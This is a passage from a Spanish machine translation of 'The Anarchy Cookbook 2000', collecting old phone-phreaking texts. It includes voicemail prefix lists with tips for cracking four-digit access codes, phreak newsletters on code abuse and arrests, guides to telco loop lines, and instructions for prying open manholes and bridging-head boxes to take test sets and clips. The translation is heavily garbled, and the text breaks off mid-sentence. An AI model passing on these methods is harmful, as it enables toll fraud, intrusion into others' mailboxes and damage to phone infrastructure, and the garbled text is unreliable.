El otro tipo es el sistema único buzón. Estos se instalan generalmente en un prefijo reservado en un código de área. (Ej: 713-684-6xxx) Estos sistemas suelen estar controlados por el mismo tipo de hardware / software. Para acceder a la zona donde se introduce la contraseña, simplemente pulse '0 'para un segundo o algo así. Los códigos de acceso son cuatro (4) dígitos. La única manera de cortar estos es manualmente. Lo mejor que podrías hacer es encontrar uno que no tiene una grabación de una persona, pero sólo la voz digitalizada. Si hackear uno que alguien que ya posee, lo van a reportar y no va a durar todo el tiempo.

Aquí está una lista de buzones de correo o prefijos que le ayudarán a empezar-------------------------------------------------- ------------------------

Solo Múltiple Nombre Dígitos213-281-8xxx 212-714-2770 3213-285-8xxx 216-586-5000 4213-515-2xxx 415-338-7000 Álamo temblón Mensaje del sistema 3214-733-5xxx 714-474-2033 Western Digital 214-855-6xxx 800-222-0651 Vicente y Elkins 4214-978-2xxx 800-233-8488 3215-949-2xxx 800-447-8477 Fairylink 7312-450-8xxx 800-521-5344 3313-768-1xxx 800-524-2133 RCA 4

Page 96: 106652012 the Anarchy Cookbook 2000 Es

405-557-8xxx 800-527-0027 TTE TeleMessager 6602-230-4xxx 800-632-7777 Asynk 6619-492-8xxx 800-645-7778 SoftCell Computadoras 4713-684-6xxx 800-648-9675 Zoykon 4 800-847-0003 Mundial de las Comunicaciones 3

90. Remoto Informador Edición # 3 por Tracker, capitán Ye, Norman Bates

IntroducciónHa sido un mes, y mucho ha sucedido. Tanto, de hecho, que la información se divide en varios temas. Esto no debería ser una descarga ya he mencionado en el primer número que se puede poner varias cuestiones a veces. Quiero felicitar a los lectores para finalmente contribuir a la newsletter. Estos dos primeros números eran toda la información sobre que yo mismo, que se obtiene. Varias personas me dieron la información sobre estos temas, y su empuñadura y la información se incluye en los artículos.

ITT tiene 9 dígitos!Para aquellos de ustedes que no lo sabía, ITT tiene nueve códigos de dos dígitos. Se dice que dan mejores conexiones en cierta medida. Esta información fue dada originalmente a nosotros por la bestia de las Partes.

Móviles Phreaky Ir Abajo!Los teléfonos Phreaky famosos son de nuevo. El hombre moderno, la persona original que ellos comenzaron, ha dicho que será hasta nuevo aviso. Mientras tanto, otras cajas independientes están siendo iniciado. Un listado puede estar hecha de los actuales a petición.

Adepto Magnus es detenidoMiembro Atarian y conocido Phreak Adepto Magnus quedó atrapado por MCI. Los detalles del cómo, cuándo y dónde no se sabe en este momento. Lo sorprendieron con 150 códigos y podría tener que pagar hasta 50 dólares por cada código.

Códigos de Sprint está muriendo rápido!Códigos de Sprint no son difíciles de conseguir y cuando se obtengan, tienden a morir más rápidamente. Phreakers han estado diciendo que el puerto 950-0777 está muerta, sino por el contrario, todavía está disponible en los estados que no están muy maltratados por phreaks. Una vez más, los rumores se difunden.

Los mejores BBS del MesA partir de ahora en adelante, vamos a tener una BBS del mes. Vamos a elegir un BBS, independientemente del tipo de ordenador, y ver la participación de los usuarios en asuntos relacionados con Phreak, así como los debates sobre los temas de calidad de diversos ilícitos. Un BBS puede permanecer el BBS del mes, siempre y cuando sean residentes por encima del resto de los sistemas BBS. A pesar de que a veces llevar a cabo más de un problema en un mes, la Junta seguirá siendo BBS del mes hasta la primera edición en el mes que viene sale.

BBS de este mes del mes es del FBI PirateNet. Elegimos este foro, debido a la gran cantidad de mensajes en las bases, y no sólo información, pero las discusiones, así, con un número mínimo de puestos de raggers y braggers. El número de es 516-661-7360. El Sysop del FBI PirateNet es el fantasma, que no debe confundirse con un NARC antes.

EE.UU. Sprint espera que recorte de personal, consolidar las divisionesNueva York - EE.UU. Sprint Communications Corp., la compañía con problemas de larga distancia, se espera poder anunciar pronto que va a recortar su fuerza de trabajo por varios cientos de personas y reducir sus divisiones regionales de siete a 3 grupos de operación, fuentes cercanas a la compañía.

La compañía de la División del Pacífico con sede en Burlingame,California. Los despidos y la reorganización son parte de un plan por el nuevo presidente de EE.UU. de Sprint,

Page 97: 106652012 the Anarchy Cookbook 2000 Es

Robert H. Snedaker, para reducir pérdidas de explotación, que los analistas esperan que para llegar a más de US $ 800 millones este año.

Snedaker sustituyó a Charles M. Slibo, quien se vio obligado a dimitir en julio debido a las pérdidas corrían mucho más alto que las empresas matrices que esperaba. Problemas con el sistema de la compañía de facturación computarizada también contribuyó al derrocamiento de Skibo. EE.UU. Sprint es propiedad y está operado por la Corporación GTE y Telecom Unidos.

De acuerdo con fuentes cercanas a Snedaker, que fue vicepresidente y director de operaciones de United Telecom, que tiene la intención de consolidar la empresa 7 divisiones, que operan en las mismas regiones geográficas como el regional de siete Campana empresas operadoras, en 3 divisiones.

La justificación de la medida, de acuerdo con analistas de la industria, es que la compañía necesitará una mano de obra mucho más pequeña una vez que comienza el manejo de toda su tráfico telefónico de su nueva red de fibra óptica, que puede llevar a un mayor número de llamadas telefónicas a un menor costo. Funcionarios de la compañía han dicho que esperan tener la mayoría del tráfico en la red de principios del próximo año. Una fuente dijo que no habría más de una ronda de despidos en los próximos meses y que en última instancia, la compañía planea reducir su fuerza de trabajo 14.000 miembros en 15 por ciento.

Varios altos ejecutivos se espera a renunciar tan pronto como EE.UU. Sprint centraliza su comercialización y operaciones de apoyo a su sede en Kansas City,MO., Según un informe publicado en el último número de la revista Business Week.

Un portavoz de EE.UU. Sprint dijo el viernes que la compañía no haría comentarios sobre los rumores. La compañía es la nación de la compañía de larga distancia más grande en tercer lugar, después de la American Telephone and Telegraph Co. (AT & T) y MCI Communications Co.

El año pasado, Washington basado en MCI llevó a cabo una reorganización similar en el que se registró una pérdida de $ 502 millones y medio para anotar el inventario de edad y las operaciones de reestructuración.

Los analistas dijeron que es EE.UU. Sprint es la obtención de beneficios, la empresa debe aumentar su cuota de mercado. "Para ello, EE.UU. Sprint debe ganar clientes de negocios más grandes, que representan alrededor del 80 por ciento de los ingresos de la industria", dijo Robert B. Morris III, de Valores, en San Francisco.

Morris dijo que mediante el uso de una campaña de marketing para diferenciar mancha de toda su red de fibra de teléfono de los de sus competidores, EE.UU. Sprint más que duplicado su base de clientes el año pasado. Sin embargo, "la mayoría de estos clientes eran usuarios residenciales y pequeñas empresas que aportaban muy poco a la línea inferior de Sprint", agregó. "Si la compañía espera ser rentable, tendrá que concentrarse en proporcionar el mejor servicio a los usuarios de volumen."

Servicio Secreto arremete contra los hackers adolescentesMonte Líbano,Pensilvania - El Servicio Secreto de los EE.UU. y los departamentos de policía locales han puesto un buen susto a la comunidad hacker con una ofensiva nacional contra los delitos informáticos que se ha traducido en la detención de los piratas adolescentes en al menos tres ciudades.

"Las personas que controlan los tablones de anuncios dicen que hay un montón de hackers nervioso por ahí, preguntándose quién será detenido después", dice Ronald E. Freedman, vicepresidente de gestión de la información avanzada, una Woodbridge,VA equipo base de la empresa de seguridad.

Nueve adolescentes de Monte Líbano Junior-Senior de Escuela secundaria cerca de Pittsburg,Pensilvania, Fueron recientemente arrestados y acusados de fraude informático. Los menores de edad presuntamente utilizó ordenadores personales para ganar acceso ilegal a un centro de autorización de tarjeta de crédito. Se obtuvo un

Page 98: 106652012 the Anarchy Cookbook 2000 Es

número válido de tarjeta de crédito y las usó para comprar miles de dólares en mercancía por correo, dijo la policía.

Freedman dice que parece que los hackers utilizan algunas técnicas relativamente sofisticadas en el esquema, incluyendo el software especialmente escrito que les permitió eludir los controles de seguridad y navegar a través de registros de crédito para obtener información clave.

Las autoridades policiales dicen que los hackers también obtuvieron los códigos de acceso de piratas sistemas de tablones para hacer llamadas de larga distancia y tener acceso a varios negocios y las computadoras del gobierno.

Los arrestos fueron el resultado de una investigación de 6 semanas por el Servicio Secreto y el Monte Líbano de la policía. La policía fue alertada por los padres que sospechaban acerca de cómo su hijo logró obtener una tabla de skate valorada en $ 140.

El Servicio Secreto también estuvo implicado en las investigaciones que condujeron a la detención de varios hackers en el San Francisco y Nueva York pasado mes de julio.

Portavoz del Servicio Secreto William Corbett afirma que, aunque algunos informes han retratado a los hackers como parte de una organización criminal nacional, los casos no están relacionados. "Es sólo que algunos de estos casos los ordenadores de hacking llegó a un punto más o menos al mismo tiempo", dice.

La legislación federal aprobada en 1984 le da al Servicio Secreto, que forma parte del Departamento del Tesoro, un papel importante en la investigación de delitos informáticos. En el marco del Fraude y la Ley federal de abuso de 1986, el fraude informático es un delito que conlleva una pena máxima de 5 años por la primera ofensa, y 10 años para el segundo. Viendo las contraseñas no autorizadas en los tablones de anuncios de hacking conlleva una pena máxima de 1 año de cárcel por la primera ofensa, y 10 años para el segundo.

Los adolescentes alemanes crack de la NASAWashington,D.C. - Un grupo de adolescentes de Alemania Occidental desde el Chaos Computer Club penetró una red de la NASA recientemente, diciendo que lo estaban haciendo a "probar la seguridad."

Lo que obtuvieron fue en SPAN Net, una red informática con cerca de 700 notas, que en realidad está basado en la Goddard Espacio Centro en Maryland. Todo lo que hay ahí son los datos no clasificados, información sobre la ciencia del espacio, y después del vuelo de análisis de datos. "Cualquier persona con la investigación relacionada con la NASA pueden solicitar el acceso a SPAN", dice un portavoz, que añade que la red se ejecuta en hardware de VAX diciembre. "Nos tomó tres intentos para tener acceso y poner en las medidas de seguridad por lo que no iba a suceder." Su opinión personal es, "Estamos contentos de que no podían volver a entrar, y decidió hacerlo público." Asimismo, añadió que la NASA tiene muchas otras redes, muchos de los clasificados y "impenetrable, probablemente. Pero yo no quiero cuestionar a nadie".

¿Cómo lo consiguen en el? Probablemente tiene una licencia de Alemania Occidental de la NASA, que les dio un pase de visitante, y luego crearon nuevas contraseñas con la seguridad plena para sí mismos, después de lo cual moverse por la red era fácil.

91. Remoto Informador Edición # 4 por Tracker, Norman Bates, capitán Ye

Sistemas de conmutaciónActualmente existen tres formas diferentes de sistemas de conmutación que están presentes en el Estados Unidos hoy en día. Paso a Paso (SxS), el travesaño, y el Sistema de Conmutación Electrónica (SEE) conforman el grupo. Phreaks siempre han sido una tentativa poco cuando se trata de "hacer su trabajo" una vez que han oído hablar de los efectos de los sistemas de conmutación de su afición. Después de investigar este tema, he descubierto que realmente no hay mucho de qué preocuparse. Siga leyendo, mientras que comparto con ustedes la información que he recopilado acerca de todos estos sistemas de conmutación y sus distintas características.

Page 99: 106652012 the Anarchy Cookbook 2000 Es

El sistema de conmutación primera vez que se utilizó en el país fue llamado Paso a Paso. Este fue adoptado en 1918 por Campana, Y hasta 1978, tenían más del 53% del total de sus intercambios con Paso a Paso (SxS). Este sistema es conocido por su larga cola, confuso de los interruptores que se utilizan para su paso a cambio de paso.

Paso a paso tiene muchas desventajas a los usuarios de teléfonos. El tren conmutador se atasca con bastante frecuencia, y hace que las llamadas sean bloqueadas. Además, SxS no permite el uso de marcación DTMF. Esto explica algunas de las áreas de la Estados Unidos que no puede tener contacto capacidades de marcación de tonos. Una enorme cantidad de energía eléctrica y el mantenimiento necesario para acompañar el sistema de conmutación de SxS, que lo hace aún más impratical. Con todo, este es probablemente el sistema de conmutación más arcaica alrededor.

Hay un número de maneras de ver si se encuentra en SxS. Usted se dará cuenta de que no hay cifras pulsaciones después de marcar. La mayoría de las fuentes dicen que la compañía de teléfono va a sonar como máquinas de escribir muchos. SxS no ofrece características tales como velocidad de llamadas, desvío de llamadas, llamada tripartita, llamada en espera, y otros servicios similares. Los teléfonos públicos de tarjetas SxS también quieren su dinero antes de recibir un tono de marcado. Esto añade a la lista de desventajas marcadas a la del paso por los sistemas de conmutación Paso.

Otro tipo de sistema de conmutación que prevalece en el Estados Unidos es travesaño. Crossbar ha sido Campana'S principal selector después de 1960, y tres tipos de su existencia. Número 1 barra transversal (1XB), Número 4 travesaño (4xB), y el número 5 travesaño (5xB). En el travesaño, una matriz de conmutación se utiliza para todos los teléfonos en un área, y cuando alguien llama, se determina la ruta y se encontró con el otro teléfono. Esta matriz es puesta en marcha en caminos horizontales y verticales. A diferencia de otros sistemas de conmutación, en mi investigación, yo no podía llegar a cualquier característica distintiva de los verdaderos y definitivos de los sistemas de conmutación Crossbar.

La Electronic Switching System (ESS) es otro sistema de conmutación utilizado en la Estados Unidos y el más utilizado de todos los tres sistemas de conmutación. ESS es un tipo muy avanzado y multi-cara-de un sistema de conmutación, y es temido por los merodeadores de la compañía de teléfonos en todo el mundo. Con ESS, su compañía de teléfono es capaz de conocer todos los dígitos marcados (incluidos los errores), que se llama, cuando le llamó, y el tiempo que estaban conectados. SEE también está programado para imprimir el número de personas que hacen llamadas a los números excesivos WATS (800 servicios) o de asistencia de directorio. Esta característica de la ESS se llama 800 Informe de llamadas excepcional, y ha significado el fin de algunas formas de trucos de código continuas a determinadas extensiones. ESS también puede ser programado para imprimir los registros de los que llamaron y abusado de ciertos números también. Todo se mantiene un seguimiento de en sus registros.

Los hechos mencionados muestran que la SEE ha hecho el trabajo de organizaciones como el FBI, la NSA y la seguridad de otra empresa de telefonía obliga más fácil. El rastreo puede realizarse en cuestión de microsegundos, y el resultado será convenientemente impreso en el monitor de un agente de compañía telefónica. SEE también está programado para recoger los tonos de "extranjeros" en la línea de teléfono, tales como los tonos de muchas y variadas emulados por las cajas.

SEE puede ser identificado por algunas características comunes en ella. El servicio de emergencia 911 se cubre en las últimas versiones de ESS. Además, se le da el tono de marcado primero cuando se utiliza un teléfono público a diferencia de SxS. Llamar a los servicios como transferencia de llamadas, llamada en la velocidad y la llamada en espera también son comunes a la SEE. Otra característica común de ESS es ANI (Automatic Number Identification) para las llamadas de larga distancia. Como puede ver, ESS es, básicamente, el cenit de todos los sistemas de conmutación, y es probable que la plaga en todo el país a principios de la década de 1990. Poco después, debemos mirar hacia adelante a un sistema que denominamos clase. Este sistema de conmutación contendrá la característica de tener el número de la persona que está llamando ha impreso en su teléfono.

Page 100: 106652012 the Anarchy Cookbook 2000 Es

¿Qué he concluido acerca de estos sistemas de conmutación? Bueno, no son lo suficientemente buenos. Conozco a unas cuantas personas empleadas por la compañía telefónica, y sé que es un hecho que no tiene tiempo suficiente en estos días que preocuparse por los usuarios de código, especialmente en grandes áreas metropolitanas. Por lo tanto, voy a salir a un miembro aquí y decir que una gran parte de la gente nunca tendrá que preocuparse acerca de los horrores de la SEE.

Nuevo Gizmo puede cambiar de género de vozEl dispositivo más sorprendente se ha convertido en el nuevo catálogo de Hammacher Schlemmer: la voz de teléfono cambiador de género. Lo que hace es cambiar el tono de su voz, digamos, de la soprano al bajo - de una manera más eficaz para disuadir a una persona que llama telefónica obscena justo cuando está entrando en calor. Eso no es lo mismo que ejecutar un 45 rpm. grabar a 33. En la conversión digital, el tono se puede cambiar sin alterar la velocidad.

El dispositivo funciona con una mezcla de 9 voltios y se adhiere a la pieza de la boca de teléfono con un acoplador de goma que lleva, sino un momento para poner y quitar. Con el cambiador de encendido, dice Lloyd Gray, Hammacher Schlemmer experto técnico ", el efecto es similar a lo que se oye cuando entrevistan a una mujer anónima en la televisión y disfrazar su voz mediante la profundización de la misma." "Es mejor para el cambio de la voz de una mujer a un hombre que al revés", dijo Gray. Un hombre puede utilizar para aumentar el tono de su voz, pero aun así no va a sonar como una mujer ". Un hombre puede, sin embargo, utilizar el cambiador de disfrazar su voz. Pero con el dispositivo de inserción alta, la voz de Gray podría ser identificado como el suyo. El bajo, su voz de tenor llegó a ser tan normales como la grava, que las palabras eran ininteligibles.

92. Remoto Informador Edición # 5 por Tracker, Norman Bates, y capitán Ye

AT & T tarifasWASHINGTON - American Telephone & Telegraph Co. propuso el martes a bajar sus interestatales tarifas de larga distancia en un promedio de 3,6% para reflejar la reducción de costos en la conexión a la red telefónica local. El mayor descenso - 6,3% - se ve en los precios del tiempo del día "Debido a la necesidad de hacer los precios más competitivos," AT & T, dijo.

Las tarifas para las llamadas realizadas durante las horas de la noche caería un 2,2% y las llamadas realizadas durante la noche y fines de semana se reduciría en un 0,8%, dijo la compañía. Las reducciones en las tasas entraría en vigor el 1 de enero si son aprobados por la Comisión Federal de Comunicaciones. En respuesta a los recortes de precios propuestos, MCI Communications Corp. y los EE.UU. de Sprint Communications Co., de la nación las compañías de larga segunda mayor y la tercera más grande de la distancia, respectivamente, dijo que su respuesta dependerá de lo que la FCC aprueba finalmente, pero ambos manifestaron su intención de seguir siendo competitivos con los de AT & T. AT & T, el más grande de la nación compañía de larga distancia, propuesta a la FCC que sus tasas de interés caen hasta US $ 800 millones, pero AT & T dijo que la cantidad exacta dependerá del acceso cobra la FCC permite que las compañías de telefonía local para cobrar a los transportistas de larga distancia, que deben pagar las tasas para conectar a la red telefónica local.

AT & T ha desafiado a las tarifas de acceso de nuevos presentados por la región Campana las empresas que operan, argumentando que son más de $ 1 billón demasiado alto. Al proponer sus nuevas tarifas, el líder de larga distancia, dijo la FCC que espera que las tasas de acceso de las empresas locales a caer por lo menos $ 200 millones - lo que equivaldría a una reducción de la tasa promedio de menos del 1%. Pero la compañía dijo que cree que la FCC podría ordenar un adicional de $ 600 millones en reducciones de la base en el desafío de AT & T.

"Estamos seguros de que la FCC reconoce que los cargos de acceso presentadas por las compañías telefónicas locales tienen que reducirse sustancialmente, lo que significaría un mayor ahorro para nuestros clientes", dijo Larry Garfinkel, AT & T vicepresidente de

Page 101: 106652012 the Anarchy Cookbook 2000 Es

marketing. Dijo que la compañía presentó sus propuestas con base en las tasas de cargos en disputa porque "queríamos que el público reaccione ... y aún más para que la FCC tiene pleno conocimiento de dónde nos dirigíamos dada nuestra expectativa de que teníamos una base válida para la disputa de ". De larga distancia de AT & T las tasas se han reducido en aproximadamente un 34% desde que la compañía fue despojado de sus compañías operativas locales por un decreto de defensa de la competencia hace casi cuatro años. Desde entonces, los contribuyentes telefónica han estado pagando una proporción mayor de lacostos de mantenimiento de la red local a través de los cargos mensuales de línea de abonado,ahora $ 2,60 para los clientes residenciales. Eso ha reducido la participación de las empresas de larga distancia de los gastos de la red local, que se pagan en forma de cargos de acceso. Jack Grubman, analista de teléfono con PaineWebber Inc., dijo que la propuesta de AT & T dirigido a los clientes de negocios, porque "ahí es donde la competencia es y donde la mejor (la ganancia) son los márgenes". Además, su objetivo es mantener la presión sobre la competencia en llamadas internacionales mediante la ampliación de descuentos a más clientes. Grubman añadió que, si la propuesta de la empresa la tasa es aprobado por la FCC, que se espera no más recortes en las tasas de AT & T en 1988. Wendell Lind, AT & T administrador de tasas y tarifas, dijo que los recortes para los clientes comerciales y residenciales son casi iguales, porque los cortes comerciales se ven compensados por una propuesta de $ 128 millones aumento en las tasas de líneas privadas de AT & T.

AT & T es la única compañía de larga distancia cuyas tarifas están reguladas por la FCC, pero sus precios se mueve al ritmo de la industria. Aunque AT & T es mucho mayor que cualquiera de sus competidores, su cuota de mercado ha venido disminuyendo desde la cesión y la compañía ahora dice que sirve a cerca del 75 por ciento del mercado. Además de las reducciones en la base tarifas de larga distancia, AT & T propuso la reducción de precios en un 5% y el 5,7% de sus Pro-America planes de llamadas. La compañía también propone reducir los precios un 2,9 por ciento de sus 800 clientes de servicio y un 4,4 por ciento para los clientes de WATS, a pesar de que aumentaría los cargos de acceso mensual de la línea de los planes de 3,20 dólares para reflejar más altos cargos de acceso especiales presentadas por las compañías telefónicas locales.

EE.UU. Operador de Sprint servicios de tráfico se incrementa un 40%ORLANDO,Florida - EE.UU. Sprint anunció el miércoles sus operadores de larga distancia que comenzaron a decir: "¿Puedo ayudarle?" hace apenas cinco meses, ahora el manejo de tres millones y medio de llamadas al mes.

La fibra óptica de larga distancia, ofreciendo la alternativa del operador único servicio de AT & T ha experimentado un crecimiento del 40 por ciento en el servicio de operador de llamadas desde que anunció su servicio de 1 de julio. Amanda Weathersby, EE.UU. Sprint vicepresidente de marketing de producto, dijo el martes, "Más y más personas se están aprovechando de nuestra ayuda se complete la llamada y los arreglos alternativos de facturación." Recargos de clientes son los mismos que AT & T con el beneficio añadido de los EE.UU. de Sprint de fibra óptica la calidad y reducir tarifas de larga distancia ". EE.UU. Sprint actualmente ofrece de persona a persona, de estación a estación, llame a la terminación y llamadas por cobrar. EE.UU. Sprint ha anunciado un acuerdo con EE.UU. Servicio de Enlace Occidente, que permitirá a cualquier persona hacer un llamamiento a EE.UU. Sprint y cargar sus llamadas a un principio de funcionamiento regional de Bell Co. tarjeta de visita en el primer trimestre de 1988.

"Antes, nuestro servicio de operador sólo estaba disponible en pre-suscrito los Estados Unidos teléfonos Sprint y recientemente hemos añadido asistencia de un operador de Estados Unidos a los clientes de Sprint FON CARD", dijo Weathersby. "Con este nuevo acuerdo, vamos a ser capaces de ampliar nuestro servicio de operador a los mercados, tales como teléfonos públicos, hospitales, hoteles y moteles". La más reciente es de 24 horas el operador del centro de servicios en Dallas comenzó sus operaciones el 5 de octubre. EE.UU. Otros centros de servicio de Sprint operador se encuentra en: Cherry Hill,Nueva Jersey;Atlanta;Lombard,Illinois y Reno,Nevada.EE.UU. Sprint es una empresa conjunta de United Telecommunications Inc. Kansas City,MO y GTE Corp., de Stamford,Connecticut

Page 102: 106652012 the Anarchy Cookbook 2000 Es

Pacífico Campana Siguiendo Calling Card ladrónSAN FRANCISCO - (BW) - Pacific Bell advierte a los consumidores para proteger su teléfono de las tarjetas de llamadas como cualquier otra tarjeta de crédito a raíz de una serie de fraudes por personas que se hacen pasar por empleados de la compañía de teléfono. Un portavoz de Pacific Bell dice que los clientes en los códigos de área 213, 805 y 916 está siendo víctima de alguien que dice que es un empleado de la compañía telefónica la investigación de fraude de tarjeta de llamada. El individuo llama a la gente en su casa a horas intempestivas, pidiendo su número de tarjeta de llamada. Luego vende los números de personas que utilizan los números para hacer llamadas de larga distancia. En fecha tan reciente como el lunes de esta semana, 180 llamadas de larga distancia se facturan a una Sacramento residente en la zona que había dado su número para que el ladrón sólo tres horas antes. De acuerdo con Pacific Bell, este tipo de esquema y otras formas de fraude de tarjetas de llamadas de clientes de telefonía de costo en todo el país medio millón de dólares al año. La compañía ofreció los siguientes consejos a los consumidores para evitar ser una víctimade fraude por tarjeta telefónica:

Nunca dé su número de tarjeta de llamada o número de identificación personal a nadie. Cualquier empleado de la compañía telefónica con una necesidad legítima de conocer el número tiene acceso a ella. Trate a su tarjeta telefónica como cualquier otra tarjeta de crédito. Informar la pérdida inmediatamente llamando al número 800 en la parte posterior de la tarjeta 800-621-0430. Si usted recibe una llamada sospechosa con respecto a su tarjeta de llamada telefónica, repórtelo llamando al número 800 en la parte posterior de la tarjeta. Si usted recibe una llamada de alguien que dice ser un empleado de la compañía telefónica y pedir el número de su tarjeta de visita, pida un nombre y un número para volver a llamar. Luego llame a la oficina de negocios locales del Pacífico Bell para reportar el incidente.

Un sospechoso fue detenido en El sur de California la semana pasada por un cliente de pensamiento rápido, que fue lo que hizo. Pacific Bell inmediatamente en contacto con el departamento de policía local. Un sospechoso de la celebración de siete números robados de tarjetas de llamadas fue detenido minutos más tarde. Pacific Bell y compañías de larga distancia de teléfono ¿Los clientes de crédito para llamar a determinados cargos de la tarjeta ha sido fraudulenta. Pacific Bell es una subsidiaria de Pacific Telesis Group, una empresa de telecomunicaciones diversificada con sede en San Francisco.

93. El phreaker Guía para Bucle Líneas de The Jolly Roger

Un bucle es un dispositivo maravilloso que la compañía telefónica creada como números de prueba para los reparadores de teléfono, cuando el equipo de prueba. Al igualar el tono del equipo con el tono del bucle, reparadores puede ajustar y probar la configuración de su equipo telefónico. Un bucle, básicamente, consta de dos números de teléfono diferentes. Vamos a usar A y B, como un ejemplo. Normalmente, si una llamada, usted escuchará un tono alto (esto es un tono de 1004 Hz), y si se llama a B, la línea de conexión será, y será seguido por el silencio.

Este es el formato de una línea de bucle. Ahora, si alguien llama a A y otra persona llama B - Viola - Un bucle y B juntos, y una conexión que se haga. Ma Bell ha hecho este reparadores así se pueden comunicar entre sí sin tener que llamar a su oficina propia reparación. También se puede utilizar para los programas de intercambio, como por ANA o de devolución de llamada. Además, muchas de CO tienen una "Bucle Asignación Centro. "Si alguien tiene alguna información sobre estos centros por favor dígame todos modos, así es como un lazo que se construye a partir de esta información, cualquier persona puede encontrar una línea del loop Volviendo al ejemplo A y B, Nota:... El lado el tono y el lado en silencio puede ser A o B. No se deje engañar si la compañía telefónica se decida a trepar en torno a ser lindo. Como usted sabe, loops vienen en pares de números. Por lo general, inmediatamente después de la otra.

Por ejemplo: 817-972-1890 y

Page 103: 106652012 the Anarchy Cookbook 2000 Es

817-972-1891

O, para ahorrar espacio, una línea de bucle se puede escribir como 817-972-1890 / 1. Esto no siempre es cierto. A veces, el patrón es de decenas o cientos, y, en ocasiones, los números son aleatorios. En las ciudades, por lo general de la compañía telefónica ha asignado un sufijo de número de teléfono que los lazos se utilizará para. Muchos diferentes prefijos se corresponde con el sufijo una. En Arlington,Texas, Un sufijo popular para los bucles es 1893 y 1894, y una gran cantidad de prefijos coincidan con ellos para hacer el número.

Por ejemplo: 817-460-1893 / 4 817-461-1893 / 4 817-465-1893 / 4 817-467-1893 / 4 817-469-1893 / 4 ... Son todos los lazos de ... o un camino más corto para escribir esto es: 817-xxx-1893/4 xxx = 460, 461, 465, 467, 469Nota: Usted puede mezclar y combinar un sufijo popular entre los otros prefijos en una ciudad, y casi siempre encuentran otros bucles o los números de prueba.

Nota: Para Houston, Los sufijos de los ciclos son de 1499 y 1799. Y para Detroit es 9996 y el 9997. Cuando hay un gran número de bucles con el formato mismo prefijo, es probable que muchos bucles será inter-bloqueado. Utilizando el ejemplo anterior de la Arlington bucles de nuevo, (voy a escribir los prefijos para ahorrar espacio) 460,461, y 469 son bucles entrelazados. Esto significa que sólo un lado puede ser utilizado enun momento dado. Esto es así porque todos ellos están en el mismo circuito. Para aclarar, si se llama 817-461-1893, 817-460 y 469-1893 no puede ser llamado porque dicho circuito está siendo utilizado. Esencialmente, los bucles de enclavamiento son todos la misma línea, pero hay una variedad de números de teléfono para acceder a la línea.

Además, si el operador se le pide a romper en una línea de bucle ocupado que él / ella va a decir que el circuito está sobrecargado, o algo por el estilo. Esto se debe a Ma Bell ha tomado el control de equipos de la línea. Sin embargo, hay lazos rara vez se utilizan todavía muchos que pueden ser verificados y pueden tener las llamadas de emergencia adoptadas en ellas. A medida que han descubierto, los bucles hay de muchos tipos. Otro tipo de bucle es un bucle se filtró. Se trata de líneas de bucle que la cooperación tel ha puesto un filtro, de modo que las voces humanas normales, no se puede escuchar en cualquiera de las líneas. Sin embargo, otras frecuencias pueden ser escuchados. Todo depende de lo que la cooperación tel quiere el bucle que se utilizará para. Si un bucle ha llegado a ser muy popular entre la población local o de uso frecuente para las conferencias, etc co tel puede filtrar el lazo para detener el deseado "tráfico". Por lo general, el filtro se quitará después de algunos meses, sin embargo.

94. ¿Cómo Ma Campana Las obras de la Jolly Roger

En este artículo, en primer lugar se describe el hardware de terminación, el cableado, y el terminal más utilizado en el Campana sistema, y voy a incluir la sección sobre los métodos de su uso.

RED LOCALLa red de telefonía local entre la oficina central / intercambio y los abonados al servicio telefónico se puede describir brevemente como sigue:

Desde la oficina central (o de intercambio local) de un determinado prefijo (s), troncos subterráneos en la zona ir a cada área que tiene el prefijo (por lo general más de un prefijo por zona.) En cada pocas calles o zonas de las vías, la superficie de los cables subterráneos . A continuación, vaya al poste de teléfono (o en la espalda de metro, dependiendo de la zona) y luego a la casa de los abonados (o en el caso de un

Page 104: 106652012 the Anarchy Cookbook 2000 Es

edificio de apartamentos o de negocios mutli-line, a un divisor o caja de distribución / panel). Ahora que tenemos los fundamentos, voy a tratar de ir a fondo sobre el tema.

CABLES SUBTERRANEOSEstos son a veces entre oficinas troncos, pero por lo general en una zona residencial que son las líneas principales que van a salvar la cabeza o los casos de distribución. Los cables son unos 2-3 centímetros de grosor (varía), y son, ya sea en un metal o PVC de tipo tubo (osimilares). Rara vez (tal vez no en algunas zonas rurales remotas) son los cables solo "solo" en el suelo. En su lugar, son por lo general en un túnel de cemento de metro (se asemeja a una pequeña alcantarillado o drenaje pluvial.) Los pozos de registro son pesados y dirá 'Campana sistema 'en ellos. Se pueden abrir con una barra de hierro de ½ pulgada de ancho (Hookside) que se inserta en el orificio superior rectangular. Hay peldaños de la escalera que le ayudarán a bajar. Usted verá las tuberías de cable en la pared, con el rayado azul y blanco es el tronco entre oficinas (al menos en mi zona). Las otras son las líneas locales, y por lo general marcados o codificados por colores. Casi siempre hay una carta de colores de código pegado en la pared, para no mencionar los manuales de Telco que describen los cables y terminales, así que no necesito entrar en detalles. Además, suele haber algún tipo de equipo de ensayo, y con frecuencia Campana equipos de prueba se quedan ahí.

JEFES DE CORRESPONDENCIAEl aspecto inocente de color verde grisáceo cajas. Éstos pueden ser puentes de tronco o de puente para las residencias. El tronco principal puente cabezas son generalmente más grandes, y tienen el logotipo de la "Western Electric" en la parte inferior, mientras que las cabezas de puente normales (que pueden ser diferentes en algunas áreas, dependiendo de la compañía que son atendidos por GTE. Mirada de BH un poco diferente. Además, no se deje engañar por las cajas de rociadores!) Se pueden encontrar en la ciudad casi todos. Para abrir una cabeza de puente: si está cerrado (y te sientes destructivo), poner un martillo o una barra de hierro (el mismo que utilizó en la boca de inspección) en la ranura superior de la bisagra superior de la puerta de la derecha. Tirar con fuerza, y la puerta se estafa. Muy eficaz! Si no está bloqueado (como siempre), tomar un hexágono 7/8 pulgadas y con ello, gire el perno de 1/8 de vuelta a la derecha (se oirá un interior de lanzamiento en primavera). Sosteniendo el tornillo, gire la manija todo el camino a la izquierda y tire de ella. Para comprobar si hay una prueba de conjunto (que a menudo son dejados por Campana empleados), entra - primer cheque por una prueba de conjunto (que a menudo son dejados por Campana empleados). No debe haber un panel de terminales y alambres. Empuje el panel trasero de una pulgada más o menos, y girar el pestillo superior (redondo con una sección plana) hacia abajo. Suelte el panel y va a caer todo el camino a seguir. Normalmente hay una gran cantidad de alambre y terminales adicionales. Los conjuntos de test-se ocultan a menudo aquí, así que no lo pasan por alto (Manuales, así, a veces se colocan en la cabeza). En la puerta de la derecha es una caja de metal de las pinzas de cocodrilo. Tómese unos (Cortesía de Bell.) Pocos. En cada puerta hay un pequeño dispositivo de metal útil para todo el año. (Dice "inserte con 